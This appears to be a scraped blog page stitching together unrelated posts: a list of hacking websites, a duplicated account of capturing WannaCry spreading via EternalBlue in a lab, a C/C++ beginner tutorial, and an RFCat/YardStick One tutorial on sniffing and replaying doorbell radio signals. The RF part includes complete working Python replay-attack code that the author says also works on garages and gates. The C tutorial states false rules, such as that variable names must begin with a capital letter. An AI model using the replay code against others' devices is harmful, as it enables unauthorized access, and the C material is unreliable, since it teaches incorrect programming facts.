- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- Phrack Magazine: Digital hacking magazine.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
- Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
- Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
Tuesday, June 30, 2020
Top 15 Websites For Hackers 2018
Thursday, June 11, 2020
Pcap Of Wannacry Spreading Using EthernalBlue
Saw that a lot of people were looking for a pcap with WannaCry spreading Using EthernalBlue.
I have put together a little "petri dish" test environment and started looking for a sample that has the exploit. Some samples out there simply do not have the exploit code, and even tough they will encrypt the files locally, sometimes the mounted shares too, they would not spread.
Luckily, I have found this nice blog post from McAfee Labs: https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/ with the reference to the sample SHA256: 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c (they keep referring to samples with MD5, which is still a very-very bad practice, but the hash is MD5: DB349B97C37D22F5EA1D1841E3C89EB4)
Once I got the sample from the VxStream Sandbox site, dropped it in the test environment, and monitored it with Security Onion. I was super happy to see it spreading, despite the fact that for the first run my Windows 7 x64 VM went to BSOD as the EthernalBlue exploit failed.
But the second run was a full success, all my Windows 7 VMs got infected. Brad was so kind and made a guest blog post at one of my favorite sites, www.malware-traffic-analysis.net so you can find the pcap, description of the test environment and some screenshots here: http://malware-traffic-analysis.net/2017/05/18/index2.html
I have put together a little "petri dish" test environment and started looking for a sample that has the exploit. Some samples out there simply do not have the exploit code, and even tough they will encrypt the files locally, sometimes the mounted shares too, they would not spread.
Luckily, I have found this nice blog post from McAfee Labs: https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/ with the reference to the sample SHA256: 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c (they keep referring to samples with MD5, which is still a very-very bad practice, but the hash is MD5: DB349B97C37D22F5EA1D1841E3C89EB4)
Once I got the sample from the VxStream Sandbox site, dropped it in the test environment, and monitored it with Security Onion. I was super happy to see it spreading, despite the fact that for the first run my Windows 7 x64 VM went to BSOD as the EthernalBlue exploit failed.
But the second run was a full success, all my Windows 7 VMs got infected. Brad was so kind and made a guest blog post at one of my favorite sites, www.malware-traffic-analysis.net so you can find the pcap, description of the test environment and some screenshots here: http://malware-traffic-analysis.net/2017/05/18/index2.html
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BASIC OF CAND C++ PRograming Langauage
BASIC OF C AND C++ PROGRAMMING LANGUAGE
BASIC OF C AND C++ PROGRAMMING LANGUAGE
Introduction.
Every thing have some basic terminology and when you learn these basic things then you will be able to handle your work more easily.in the same case you Cannot learn C AND C++programing language in easy way if you does not know about the basic component of C AND C++ programming language it must be known those who really want to learn C programming language and want to be a programmer.
Basic of C AND C++ programming Language.
If you want to write a programme in C programming language then you must know about its basic rule that how to write a programme using C language. without these basics you Cannot write a programme using C language. C programming language have some basics component which is must be known every beginner who start to learn C programming language. some of the basic of C programming language is given below.
C language is develop by Dennis Ritchie in 1970. C is the hybrid of two previous programming language from B and BCPL. B ( basic ) and BCPL mean (basic Combine programming language) BCPL was develop by Martin Richard in 1967.
Character Set.
C and C++ contain three type of character set which are most important and basic element which are given below.
v Numeric Character.
v Alphabetic Character.
v Escape Character.
What Is Numeric Character.
Numeric Character are used for Calculation purpose and these are 0, 1, 2, 3, 4, 5, 6, 7, 8, 9.
What Is Alphabetic Character.
Alphabetic Character are used for naming a variable or writing programming or for user define words etc…
What is Escape Character.
Every language have some special Character which are used for special purpose C programming language have also some special Character which is Called Escape Character.
And these Escape Character are used for specific purpose.
'\' (backslash) is a special Character and is called escape Character.
If you use this '\' Character with n just like this ( \n ) then it tell the compiler that jump to the next line. It is used to leave the first line and start a new line.
Example
cout("asad \n mirza")
so when the programme is executed then it will print like
asad
mirza
How to Name a Variable.
There is some rule which are important to give a name to a variable.
In C and C++ language you can use A to Z alphabet to name a variable.
A = 5
Here A is a variable and 5 is value which is assign to it. You can also choose a name for assigning data with your own choice
forexample:
Weight=56
Age=29
Length=45
Pirce=50
Average=3.4
And so on
But keep in mind that
Ø variable name must be unique in the programme.
Ø Name of a variable is also called user define words.
Ø First letter of a variable must be written in capital words as above.
here
which is wrong variable and cause error because first alphabet of a variable must be start with capital words and here first alphabet is in lower case.
Ø Forexample
Here Average is start with capital words so this is right.
Ø No space is allowed to name a variable only '_' is used in the place of space.
Becase under score'_' is used.
Because space ' ' is used.
Separate variable name with comma ', ' .
Comma is used between two variable.
Space is used between two variable.
Ø After name a variable in the last put simi colon ';' which is mean that the variable is ended.
Example :
void main()
{
int age,name,cotact_no;
}
How To Assign A Value To Variable
C and C++ provide you three data type for assigning a value to variables.
This three data type is.
· int
· float
· char
In C language equal sign '=' is used to assign a value to avariable it is also called assignment operator.
int data type is used for integer value. And thses are (0,1,2,3,4,5,5,6,7,8,9).
float is used for decimal point value. (0.1,3.4,5.9 ……..).
char is used to give a name to a variable or to give some text to variable.
(asad, copy, ali, reg_no, name……).
Keep in mind that the data type is case sensitive and must be given in lower case letter(a,b,c,…z).
Example:
int A=5;
float B=3.5;
char C=college_name;
A simple programme
Void main()
{
char name;
int age;
float height;
name=ali;
age=18;
height=5.9;
}
Be With Us
£V£RYTHING NT
Wednesday, June 10, 2020
Hacking Everything With RF And Software Defined Radio - Part 2
YardStick One Unleashed, Automating RF Attacks In Python - An RFCat Primer
I decided to dive into our current device a bit more before moving on to a new device, and really ramp up the skillsets with RFCat and the Yardstick. So for this blog you will need our previous Target and a Yardstick One. We will be hacking everyting using only the Yardstick and Python.
If your really bored and want to follow me:Twitter: @Ficti0n
Site: cclabs.io or consolecowboys.com
Purchase Devices needed to follow this blog series:
Target 1:(from the last blog)So last time we scanned for signals with GQRX and a Software Defined Radio device. We took the demodulated wave forms in Audacity and discerned what the binary representation of our wave forms were by decoding them manually. We then transferred those into a hex format that our yardstick understood. However there is a way to do everything with our Yardstick. It will require a bit more understanding of the RFCat library, and a bit of python.
This blog will be your RFCAT primer and coding tutorial, but don't be scared with the word "Programming" I will be using simple code, nothing complicated. So if your a programmer, tune out any coding explanation and understand RFCat, if your not a coder, then use this as a jumping point to start making some quick python scripts for hacking.
Video Series PlayList Associated with this blog:
The first thing we did in our last blog after looking up the frequency was to open up GQRX and check if we can see our devices signals. As it turns out you can actually do this in python with RFCat. Which is really convenient if you left your Software Defined Radio dongle at home but happen to have access to a Yardstick.
RFCat as a Spectrum Analyzer:
In order to use RFCat as a spectrum analyzer we need to make sure we have RFcat installed and a few prerequisites such as python and PySide modules. I actually did this inside of an Ubuntu VMware because Pyside was giving me issues on OSX and I didn't feel like trying to fix it. So If you spin up an ubuntu vm you can do the following to get things up and running..
Install Spectrum Analyzer PreReqs:
sudo pip install PySide
sudo apt-get install ipython
Plug in your adapter and type in the following:
rfcat -r
d.specan(315000000)
You will then see the below output of RFCat Specan running in the 315 MHz range.
Click our doorbell, or trip the motion sensor and you will see a frequency spike as shown in the second picture.
This is similar to what you saw in GQRX but all with your Yardstick and the Python RFCat library.
So everything seems to be working and we can see our devices transmitting on the 315MHz frequency. Unfortunately we have no record button on Spescan. This leaves us to dive a little deeper into RFCat. We will see what RFCat can do for us in the recording and sniffing capacity.
Sniffing RF Data With The YardStick and Python:
In RFCat there is a simple listening command in our interactive session which will give us an idea of what is being transmitted and in what type of data format we are recieving. When using GQRX we received a WAV file, but what does RFCat give us? One thing I have realized over the years is programming is all about dealing with data in various formats and figuring out how to parse and use it in various implementations. So the first thing we have to figure out is what kind of data we are dealing with.
Lets hop back into RFCat and set a few parameters so the yardstick knows to listen on 315MHz and to use ASK modulation. The settings below should all be familiar from our last blog with an exception of "lowball" which configures the radio to use the lowest level of filtering. We basically want to see everything but may experience some noise by not filtering it out.. For example before you hit your doorbell button you may see random FF FF FF FF data outputted to the screen.
Below is the cmdline input needed and some example output. After all of our settings are in place we can use RF.listen() to start listening for everything in the 315000000 frequency range and have it output to the screen.
After you set it up, you can press the button on your doorbell and you will receive the following output. We have lots of zeros and what might be some hex output.
Destroy ficti0n$ rfcat -r
>>> d.setFreq(315000000)
>>> d.setMdmModulation(MOD_ASK_OOK)
>>> d.setMdmDRate(4800)
>>> d.setMaxPower()
>>> d.lowball()
>>> d.RFlisten()
Entering RFlisten mode... packets arriving will be displayed on the screen
(press Enter to stop)
(1508637518.258) Received: c000842139ce0000000000000021bdc218c631bdef00000000000000309ce10842109ce700000000000000109ce10842109ce70000000000000010def18c6318def780000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | ...!9........!....1.........0...B..............B..............c...........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns.................................................
If you hit "ENTER" in your terminal you will stop receiving packets and drop back into a python interactive terminal. If we take a look at the repeating pattern in the above output, it looks like some random patterns and then a repeating pattern of, 84e708421084e738. If we convert that to binary we can compare with what we decoded WAV from our previous blog.
Since we are already in a python terminal you can type the following to see the binary representation:
>>> bin(int("84e708421084e738",16))[2:]
'1000010011100111000010000100001000010000100001001110011100111000'
Lets break that up into 8 bit bytes and compare it to our previous blogs binary, hmm its lot different then what we originally decoded the signal to be:
New: 10000100 11100111 00001000 01000010 00010000 10000100 11100111 00111000
Orig: 10111000 10001011 10111000 10001000 10001011 10111011 10000000
If we take the above capture data and format it correctly for RFcat with the replay code from the last blog. When we send it over, it does indeed ring the doorbell, thats interesting. A completely different value in both hex and in binary and still we get a doorbell to ring. So the variance we talked about last time extends a bit more. Below is the code with the new hex from the capture data:
from rflib import *
d = RfCat()
d.setFreq(315000000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)
print "Starting"
d.RFxmit("\x84\xe7\x08\x42\x10\x84\xe7\x38\x00\x00\x00\x00\x00\x00"*10)
print 'Transmission Complete'
TroubleShooting Antenna Issues:
I will also take a minute to note something before we continue. I had a little trouble at first when using a telescopic antenna in RFcat and the YardStick. So I will list those issues below as notes for you to play with if you run into random looking captures when pressing your doorbell button.
- When using a telescopic antenna closed I had almost repeating output with some random bits flipped
- When extending the antenna it went crazy output with random noise
- I then used a small rubber ducky antenna and got the repeating output shown above.
What we have done so far:
So above, we managed to figure out the following all in RFCat
- Verify the frequency with RFCat
- How can I listen for it and capture a transmission with RFCat
- How can I send this transmission with RFCat
We have basically eliminated the immediate need for the graphical tools that we were using in the last blog. Not to say that they are not useful. They absolutely are, and we should use them often and know how to work with all kinds of formats and understand everything.. However, if we are living in a reality that all we have is a Yardstick and no other tools. We are not helpless and we can still kick some serious RF butt.
Now we are going to take this a bit further so we can learn some more about RFCat, Python and mistakes I made when trying to automate this stuff. I found some interesting quirks I had to work through and I would like to save others some time who are also in the learning process as I am.
Using RFrecv() for Listening:
Ok first thing I learned is that RFListen() is not all that useful when it comes to automating this stuff. I tried to set its output to a variable but that did not seem to work.. So instead we will be working with another feature that lets us listen and that is RFrecv(). If we fire up our RFCat in the terminal again we can give that a try:
Destroy:~ ficti0n$ rfcat -r
>>> d.setFreq(315000000)
>>> d.setMdmModulation(MOD_ASK_OOK)
>>> d.setMdmDRate(4800)
>>> d.setMaxPower()
>>> d.lowball()
>>> d.RFrecv()
Traceback (most recent call last):
File "", line 1, in
File "/Library/Python/2.7/site-packages/rflib/chipcon_nic.py", line 1376, in RFrecv
data = self.recv(APP_NIC, NIC_RECV, timeout)
File "/Library/Python/2.7/site-packages/rflib/chipcon_usb.py", line 664, in recv
raise(ChipconUsbTimeoutException())
ChipconUsbTimeoutException: Timeout waiting for USB response.
OK thats not cool we are getting a weird error if we don't get a signal right away regarding ChipconUsbTimeoutException.
No problem since we are in a python terminal we can just capture this exception and pass it, then continue with sniffing. This is done with a Try/Except block.
try:
... d.RFrecv()
... except ChipconUsbTimeoutException:
... pass
...
That looks a little better, I am no longer receiving errors, but lets put this in a loop so we are continuously listening with RFrecv() and press our doorbell so we can capture our doorbell signal. Below is the output of a random signal that came in followed by our doorbell.. but its all kinds of crazy looking and a bit hard to read:
try:
... d.RFrecv()
... except ChipconUsbTimeoutException:
... pass
...
while True:
... try:
... d.RFrecv()
... except ChipconUsbTimeoutException:
... pass
Lets try to fix the output a little and make it more readable by encoding it before we view it. Open up your text editor and use the following code. What we are doing here is simply setting up our listener as we did before and then setting it to a variable we can use.
Line 12: Setting our RFrecv() output to the variable y and z. The y variable is the output that we want
Line 13: We will wrap the y variable with an encode function to encode it with a HEX encoding.
Line 14: After that we just print it out.
When we run this script from the command line we will get a much nicer output shown below, much like we did with the RFlisten function above. The big difference being that our data is now set to the variable "capture" on line 13 and we can do what we want with that data. For example we can directly replay that data rather then manually performing the actions.
Parsing and replaying data:
This actually took me a bit of time to figure out, so we need to do a few things to get this to work:
- We need to parse out the data from the surrounding 0s
- We need to convert it to a format we can send (tricker then it sounds)
- We need to add padding and send that data over (We know how to do this already)
Parsing Data:
So with this I first tried all kinds of regular expressions, but for some reason the inverse of more then 3 zeros in a row does not seem to work. I am no regex master but that seemed like it should be working. I then tried a few creative solutions reducing repeating zeros down to pairs that I could split on with string functions. This actually worked well but then my buddy showed me this which was more efficient:
re.split ('0000*', capture)
All this is doing is using the regex library to parse on a set of 4 or more zeros and return whats left in a list of useable hex data for sending. So lets add that into our code and give it a try to see what we get back. I made the following code changes:
Line 2: Import the Regex library
Line 11: We defined the capture variable so we can access it outside of the Try Block and the loop
Line 21: We created a payloads variable and created a list from the capture file of non 0000 blocks
Line 22: We print out our list of useable payloads which can been seen in the below output
Data Format Woes:
So we have data in a list we can pull from, thats awesome but I ran into a few issues. I first tried to parse this data into the \x format we normally used when sending our attack payloads manually, but that actually does not work. Reason being that if I use a code snippet like the following to convert this data into the right format everything looks ok and something like this \x84\xe7\x08\x42\x10\x84\xe7. But it won't actually work when I send it with RFCat. For some reason when you paste in your own hex its in a different format then if you programmatically create hex like below. You don't really need to understand the code below, just know it takes our payload and creates the hex in a visual format to what we used in the last blog:
DON'T USE THIS.. IT WONT WORK!!!
for payload in payloads:
formatted = ""
if (len(payload) > 6) and (len(payload) % 2 == 0):
print "Currently being formatted: " + payload
iterator = iter(payload)
for i in iterator:
formatted += ('\\x'+i + next(iterator))
else:
continue
Formatted Hex Vs Manually Pasted Hex
So lets compare the outputs of our manually created Hex String versus what we get when we format with the above code
Below is the output of the following:
- Your encoded capture
- Your parsed payloads in a nice list
- Your payload being processed into hex.
But this is where things go wrong, you then have :
- Your nicely formatted Hex created by your code above (Yay for us)
- Then you have your manually pasted in hex from your original attack payloads as unprintable characters (What?)
You can clearly see there is a major difference between when we manually paste in our hex like we did in the last blog and when we create it from our capture file. This led to another sleepless night of researching whats going on. I did a bunch of troubleshooting until I found some code on the RFcat site and saw it using the BitString library and something called BitArray. The examples for this library were using binary data instead of hex and then converting it.
BitString BitArray Formating FTW:
If you remember above we created binary input with some python, so lets use that code in our current program template and then feed it into byteArray and see what happens. We can install bitstring with the following:
sudo pip install bitstring
Our New code using BitString:
Line 2: I imported bitstring
Line 25: I added a for loop to go through our payload list one by one
Line 27: I convert our current payload to binary
Line 28: I take that binary and I feed it into bitstring to fix the formatting issues
Lines 29-30: Print out our binary and our new data that match our manually pasted data format, shown below
With these conversions the data above looks like its correct to attack our target devices. I know this seems like a lot of steps, but honestly this is only 50 lines of code in all to automate our replay attacks in a simple way. It is also very easy if you know what your doing and don't spend all of your time figuring it out like I did. You just need to understand how to work with the types of data each component understands.
With this latest code update we are ready to send our code with a simple modification to our RFxmit line from the last blog. We will now change RXxmit to take our formatted variable and then append our padding:
d.RFxmit((formated+"\x00\x00\x00\x00\x00\x00")*10)
Below is our full code to automate this attack, with a few changeups, but not many.. Really all I did was add some conditional statements to limit our data to longer payloads that are divisible by 2 since our hex takes 2 string characters for example \x41 is the string character 4 and 1. I originally did this for the iterator code which required the proper amount of characters but decided to leave it since it makes sense anyway. I also set it so that if there is a capture it breaks out of the loop. This way we are not continuously attacking every transmission we see. Instead for our testing we can hit our doorbell, replay all the values before our script finishes and exits.
Note: I sent similar code to a friend and had him run it against a black box real world target. He had permission to attack this target via the owner of a facility and it worked flawlessly. So although a doorbell is a trivial target. This same research applies to garages, gates, and any other signal not using protection mechanism such as rolling code, multiple frequencies at once etc.
Note: I sent similar code to a friend and had him run it against a black box real world target. He had permission to attack this target via the owner of a facility and it worked flawlessly. So although a doorbell is a trivial target. This same research applies to garages, gates, and any other signal not using protection mechanism such as rolling code, multiple frequencies at once etc.
Also note that when you run this, almost all of the payloads in your list will ring the doorbell which is why I put a timing variable before the sending command. This way your doorbell isn't overburdened. I already broke a few of these devices during testing LOL.
I have since modified this code to be more effective, and have additional features and more niceties, I will release that code when its ready.. For now enjoy the below code and hit me up with any questions or comments.
#—————YardStick_InstantReplay_SimpleVersion.py ----------#
# @Ficti0n
# http://consolecowboys.com
from rflib import *
import time
import re
import bitstring
print("Listening for them signals in ASK")
d = RfCat()
d.setFreq(315000000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)
d.setMaxPower()
d.lowball()
#-----------Start Capture 1 Transmission ----------#
capture = ""
while (1):
try:
y, z = d.RFrecv()
capture = y.encode('hex')
print capture
except ChipconUsbTimeoutException:
pass
if capture:
break
#Parse Hex from the capture by reducing 0's
payloads = re.split ('0000*', capture)
print payloads
#----------Start Parse and Create Payload---------#
for payload in payloads:
formated = ""
if (len(payload) > 6) and (len(payload) % 2 == 0):
print "Currently being formatted to binary: " + payload
binary = bin(int(payload,16))[2:]
print binary
print "Converting binary to bytes: "
formatted = bitstring.BitArray(bin=(binary)).tobytes()
else:
continue
#------------Send Transmission--------------------#
time.sleep(2)
print "Sending bytes with padding"
d.RFxmit((formatted+"\x00\x00\x00\x00\x00\x00")*10)
print 'Transmission Complete'
Thats All Folks, Whats Next:
I hope this blog is helpful in demystifying RFCat in order to successfully perform/automate attacks with only Python and your Yardstick One. This is essentially a few nights of my research posted here for everyone to learn from. Because it was a pain to find useful information, and I would like to save other people a lot of sleepless nights. I am by no means the master of RF or RFCat, there is tons more to learn. Up next I will get back on track with a real world attack against a device and creating our own keyfobs to replay our attacks in the future.
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